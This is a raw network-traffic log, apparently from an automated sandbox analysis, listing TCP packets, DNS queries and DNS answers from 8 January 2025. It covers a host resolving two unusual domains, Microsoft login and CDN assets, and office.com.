                                                                                                                                                    Jan 8, 2025 09:53:57.325081110 CET44349856172.67.165.105192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.325145006 CET49856443192.168.2.4172.67.165.105
                                                                                                                                                    Jan 8, 2025 09:53:57.325453997 CET49856443192.168.2.4172.67.165.105
                                                                                                                                                    Jan 8, 2025 09:53:57.325525045 CET44349856172.67.165.105192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.325618982 CET49856443192.168.2.4172.67.165.105
                                                                                                                                                    Jan 8, 2025 09:53:57.325624943 CET44349856172.67.165.105192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.371731997 CET49856443192.168.2.4172.67.165.105
                                                                                                                                                    Jan 8, 2025 09:53:57.751786947 CET44349856172.67.165.105192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.751833916 CET44349856172.67.165.105192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.751892090 CET49856443192.168.2.4172.67.165.105
                                                                                                                                                    Jan 8, 2025 09:53:57.753097057 CET49856443192.168.2.4172.67.165.105
                                                                                                                                                    Jan 8, 2025 09:53:57.753113031 CET44349856172.67.165.105192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.935091972 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.935369968 CET49857443192.168.2.440.99.150.82
                                                                                                                                                    Jan 8, 2025 09:53:57.935388088 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.936259985 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.936322927 CET49857443192.168.2.440.99.150.82
                                                                                                                                                    Jan 8, 2025 09:53:57.936331034 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.936366081 CET49857443192.168.2.440.99.150.82
                                                                                                                                                    Jan 8, 2025 09:53:57.937367916 CET49857443192.168.2.440.99.150.82
                                                                                                                                                    Jan 8, 2025 09:53:57.937417984 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.937611103 CET49857443192.168.2.440.99.150.82
                                                                                                                                                    Jan 8, 2025 09:53:57.937617064 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.978101969 CET49857443192.168.2.440.99.150.82
                                                                                                                                                    Jan 8, 2025 09:53:58.215846062 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:58.215907097 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:58.215961933 CET49857443192.168.2.440.99.150.82
                                                                                                                                                    Jan 8, 2025 09:53:58.216543913 CET49857443192.168.2.440.99.150.82
                                                                                                                                                    Jan 8, 2025 09:53:58.216552019 CET4434985740.99.150.82192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:59.041961908 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                    Jan 8, 2025 09:53:59.046926975 CET8049724199.232.210.172192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:59.046987057 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                    Jan 8, 2025 09:54:02.730382919 CET49898443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:54:02.730416059 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:02.730499029 CET49898443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:54:02.730766058 CET49898443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:54:02.730778933 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:03.368172884 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:03.368659019 CET49898443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:54:03.368669987 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:03.368992090 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:03.369292021 CET49898443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:54:03.369353056 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:03.416502953 CET49898443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:54:13.288480997 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:13.288563013 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:13.288661003 CET49898443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:54:14.778112888 CET49898443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:54:14.778125048 CET44349898172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:33.291783094 CET497398443192.168.2.4172.67.195.44
                                                                                                                                                    Jan 8, 2025 09:54:33.296649933 CET844349739172.67.195.44192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:02.781699896 CET50076443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:55:02.781738997 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:02.781872988 CET50076443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:55:02.782131910 CET50076443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:55:02.782145023 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:03.434880972 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:03.435333014 CET50076443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:55:03.435343981 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:03.435672045 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:03.436088085 CET50076443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:55:03.436146975 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:03.479121923 CET50076443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:55:13.337414026 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:13.337486982 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:13.337565899 CET50076443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:55:14.778498888 CET50076443192.168.2.4172.217.16.196
                                                                                                                                                    Jan 8, 2025 09:55:14.778518915 CET44350076172.217.16.196192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:18.307775021 CET497398443192.168.2.4172.67.195.44
                                                                                                                                                    Jan 8, 2025 09:55:18.312644958 CET844349739172.67.195.44192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:56:03.325417995 CET497398443192.168.2.4172.67.195.44
                                                                                                                                                    Jan 8, 2025 09:56:03.330347061 CET844349739172.67.195.44192.168.2.4
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 8, 2025 09:52:58.324052095 CET53526351.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:52:58.403635979 CET53549411.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:52:59.406356096 CET53497151.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:01.842988968 CET6439853192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:01.843241930 CET6527653192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:02.203624964 CET53652761.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:02.267239094 CET53643981.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:02.667687893 CET5536353192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:02.667808056 CET6512853192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:02.674227953 CET53651281.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:02.674252987 CET53553631.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.341404915 CET5166353192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:03.341798067 CET5923553192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:03.343031883 CET5123153192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:03.343362093 CET6122453192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:03.346879959 CET4999553192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:03.347078085 CET6514453192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:03.348004103 CET5595953192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:03.348419905 CET5032853192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:03.349109888 CET53516631.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.349539042 CET53592351.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.349596024 CET53557601.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.351181984 CET53612241.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.351914883 CET53512311.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.354635000 CET53499951.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.354933977 CET53651441.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.355568886 CET53559591.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:03.356724024 CET53503281.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.058976889 CET5289553192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:04.059130907 CET5373253192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:04.065677881 CET53528951.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.065898895 CET53537321.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.086575985 CET5472053192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:04.086852074 CET5056953192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:04.092371941 CET5153953192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:04.092484951 CET5602753192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:04.093056917 CET53547201.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.093615055 CET53505691.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.099214077 CET53515391.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.099222898 CET53560271.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.438339949 CET5288853192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:04.438493013 CET5026853192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:04.445152044 CET53528881.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.446186066 CET53502681.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.486157894 CET53571851.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:04.721291065 CET53544481.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:10.640078068 CET53527021.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:10.643023968 CET138138192.168.2.4192.168.2.255
                                                                                                                                                    Jan 8, 2025 09:53:16.425520897 CET53610921.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:16.493715048 CET5904053192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:16.493889093 CET6009553192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:16.842555046 CET53600951.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:16.889137983 CET53590401.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:18.304133892 CET5425453192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:18.304368019 CET5847553192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:18.655289888 CET53584751.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:18.674381971 CET53542541.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:35.254301071 CET53508071.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:48.855192900 CET6199253192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:48.855345011 CET6086853192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:48.863570929 CET53619921.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:48.875579119 CET53608681.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:49.561341047 CET5305553192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:49.561567068 CET4919553192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:49.568582058 CET53491951.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:50.547595024 CET5249353192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:50.547748089 CET6164053192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:57.087578058 CET5936253192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:57.087740898 CET5417353192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET53593621.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.094743967 CET53541731.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:57.827630997 CET53505031.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:53:58.203685045 CET53595791.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:54:28.616566896 CET53651831.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:15.207182884 CET53651231.1.1.1192.168.2.4
                                                                                                                                                    Jan 8, 2025 09:55:50.574978113 CET5500453192.168.2.41.1.1.1
                                                                                                                                                    Jan 8, 2025 09:55:50.575159073 CET6233153192.168.2.41.1.1.1
                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Jan 8, 2025 09:53:01.842988968 CET192.168.2.41.1.1.10x2186Standard query (0)vnondb0nbw.satelitnetkomputer.my.idA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:01.843241930 CET192.168.2.41.1.1.10x7d0fStandard query (0)_8443._https.vnondb0nbw.satelitnetkomputer.my.id65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:02.667687893 CET192.168.2.41.1.1.10x934aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:02.667808056 CET192.168.2.41.1.1.10x75a5Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.341404915 CET192.168.2.41.1.1.10xe87fStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.341798067 CET192.168.2.41.1.1.10x9301Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.343031883 CET192.168.2.41.1.1.10x2c85Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.343362093 CET192.168.2.41.1.1.10xb09cStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.346879959 CET192.168.2.41.1.1.10xa085Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.347078085 CET192.168.2.41.1.1.10x7c09Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.348004103 CET192.168.2.41.1.1.10x93a9Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.348419905 CET192.168.2.41.1.1.10x3dceStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.058976889 CET192.168.2.41.1.1.10x11d5Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.059130907 CET192.168.2.41.1.1.10xb284Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.086575985 CET192.168.2.41.1.1.10x383aStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.086852074 CET192.168.2.41.1.1.10x90c4Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.092371941 CET192.168.2.41.1.1.10x1542Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.092484951 CET192.168.2.41.1.1.10x6c53Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.438339949 CET192.168.2.41.1.1.10x802cStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.438493013 CET192.168.2.41.1.1.10xb9dbStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:16.493715048 CET192.168.2.41.1.1.10xf598Standard query (0)bummings.chiliesdigital.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:16.493889093 CET192.168.2.41.1.1.10x408fStandard query (0)bummings.chiliesdigital.co.za65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:18.304133892 CET192.168.2.41.1.1.10x5e6aStandard query (0)bummings.chiliesdigital.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:18.304368019 CET192.168.2.41.1.1.10x46e4Standard query (0)bummings.chiliesdigital.co.za65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:48.855192900 CET192.168.2.41.1.1.10x344fStandard query (0)office.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:48.855345011 CET192.168.2.41.1.1.10xb91eStandard query (0)office.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:49.561341047 CET192.168.2.41.1.1.10x34cfStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:49.561567068 CET192.168.2.41.1.1.10x839eStandard query (0)www.office.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:50.547595024 CET192.168.2.41.1.1.10xa755Standard query (0)officehub.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:50.547748089 CET192.168.2.41.1.1.10x1692Standard query (0)officehub.nel.measure.office.net65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.087578058 CET192.168.2.41.1.1.10xd2a9Standard query (0)outlook.office.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.087740898 CET192.168.2.41.1.1.10x6001Standard query (0)outlook.office.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:55:50.574978113 CET192.168.2.41.1.1.10xdc3Standard query (0)officehub.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:55:50.575159073 CET192.168.2.41.1.1.10x9fcbStandard query (0)officehub.nel.measure.office.net65IN (0x0001)false
                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Jan 8, 2025 09:53:02.203624964 CET1.1.1.1192.168.2.40x7d0fNo error (0)_8443._https.vnondb0nbw.satelitnetkomputer.my.id65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:02.267239094 CET1.1.1.1192.168.2.40x2186No error (0)vnondb0nbw.satelitnetkomputer.my.id172.67.195.44A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:02.267239094 CET1.1.1.1192.168.2.40x2186No error (0)vnondb0nbw.satelitnetkomputer.my.id104.21.12.179A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:02.674227953 CET1.1.1.1192.168.2.40x75a5No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:02.674252987 CET1.1.1.1192.168.2.40x934aNo error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.349109888 CET1.1.1.1192.168.2.40xe87fNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.349109888 CET1.1.1.1192.168.2.40xe87fNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.349109888 CET1.1.1.1192.168.2.40xe87fNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.349539042 CET1.1.1.1192.168.2.40x9301No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.349539042 CET1.1.1.1192.168.2.40x9301No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.351914883 CET1.1.1.1192.168.2.40x2c85No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.351914883 CET1.1.1.1192.168.2.40x2c85No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.351914883 CET1.1.1.1192.168.2.40x2c85No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.351914883 CET1.1.1.1192.168.2.40x2c85No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.353087902 CET1.1.1.1192.168.2.40x17f9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.353087902 CET1.1.1.1192.168.2.40x17f9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.354635000 CET1.1.1.1192.168.2.40xa085No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.354635000 CET1.1.1.1192.168.2.40xa085No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.354933977 CET1.1.1.1192.168.2.40x7c09No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.355568886 CET1.1.1.1192.168.2.40x93a9No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.355568886 CET1.1.1.1192.168.2.40x93a9No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:03.356724024 CET1.1.1.1192.168.2.40x3dceNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.065677881 CET1.1.1.1192.168.2.40x11d5No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.065677881 CET1.1.1.1192.168.2.40x11d5No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.065898895 CET1.1.1.1192.168.2.40xb284No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.093056917 CET1.1.1.1192.168.2.40x383aNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.093056917 CET1.1.1.1192.168.2.40x383aNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.093615055 CET1.1.1.1192.168.2.40x90c4No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.099214077 CET1.1.1.1192.168.2.40x1542No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.099214077 CET1.1.1.1192.168.2.40x1542No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.099214077 CET1.1.1.1192.168.2.40x1542No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.099214077 CET1.1.1.1192.168.2.40x1542No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.384984016 CET1.1.1.1192.168.2.40xeaNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.384984016 CET1.1.1.1192.168.2.40xeaNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.445152044 CET1.1.1.1192.168.2.40x802cNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.445152044 CET1.1.1.1192.168.2.40x802cNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.445152044 CET1.1.1.1192.168.2.40x802cNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.446186066 CET1.1.1.1192.168.2.40xb9dbNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:04.446186066 CET1.1.1.1192.168.2.40xb9dbNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:16.842555046 CET1.1.1.1192.168.2.40x408fNo error (0)bummings.chiliesdigital.co.za65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:16.889137983 CET1.1.1.1192.168.2.40xf598No error (0)bummings.chiliesdigital.co.za172.67.165.105A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:16.889137983 CET1.1.1.1192.168.2.40xf598No error (0)bummings.chiliesdigital.co.za104.21.81.229A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:18.655289888 CET1.1.1.1192.168.2.40x46e4No error (0)bummings.chiliesdigital.co.za65IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:18.674381971 CET1.1.1.1192.168.2.40x5e6aNo error (0)bummings.chiliesdigital.co.za172.67.165.105A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:18.674381971 CET1.1.1.1192.168.2.40x5e6aNo error (0)bummings.chiliesdigital.co.za104.21.81.229A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:48.863570929 CET1.1.1.1192.168.2.40x344fNo error (0)office.com13.107.6.156A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:49.568582058 CET1.1.1.1192.168.2.40x839eNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:49.568582058 CET1.1.1.1192.168.2.40x839eNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:49.580694914 CET1.1.1.1192.168.2.40x34cfNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:49.580694914 CET1.1.1.1192.168.2.40x34cfNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
